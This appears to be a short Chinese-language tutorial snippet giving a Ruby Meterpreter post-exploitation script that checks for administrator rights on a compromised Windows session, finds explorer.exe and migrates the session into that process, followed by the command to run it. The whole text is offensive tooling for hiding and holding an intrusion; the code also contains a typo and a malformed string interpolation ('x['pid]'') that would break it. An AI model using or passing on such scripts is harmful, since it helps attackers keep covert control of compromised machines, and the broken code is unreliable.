整体代码,这个脚本会检查我们现在是否为管理员,然后找到explorer进程,并自动迁移到这个进程
admin_check = is_admin?
if(admin_check)
print_good("Current user is admin")
else
print_error("Current uesr is not admin")
end
session.sys.process.get_processes().each do |x|
if x['name'].downcase=='explorer.exe'
print_good("explorer.exe process is running with PID #{x['pid]'}")
explorer_ppid = x['pid'].to_i
print_good("migrating to explorer.exe at PID #{explorer_ppid.to_s}")
session.core.migrate(explorer_ppid)
end
end
使用方法:进入meterpreter后运行run mymet #脚本名称